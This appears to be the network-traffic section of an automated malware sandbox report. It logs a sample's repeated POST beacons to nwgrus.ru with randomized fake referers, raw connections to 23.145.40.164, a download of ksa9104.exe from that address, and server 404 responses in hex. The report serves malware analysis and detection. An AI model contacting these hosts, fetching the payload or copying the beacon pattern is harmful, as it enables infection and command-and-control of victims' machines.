                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvyvdbiqyxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjfbbnssutajqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icltdtwcxuda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxmpwtofksapy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prhupsyenaon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjcbyveqviwch.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uppdgnyegjvory.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldpymxrfawi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucebrpsptgm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvyisbukobdqdei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kymcsuriadoaei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wypsmdkfdcadpn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erjyaeignxsu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcjitqwtqilsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cweiuociftg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncmvgkvwguax.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trelswnfdtmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mltvlrabpgii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfqqxnqsmcop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gottjuiosjatm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgntleolvdwaddkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jevspcjflxdrnyqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvjdoetwalpqj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsomhlsnqixrhe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                  Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                  Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:40 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:41 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:50 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:05 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:25 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
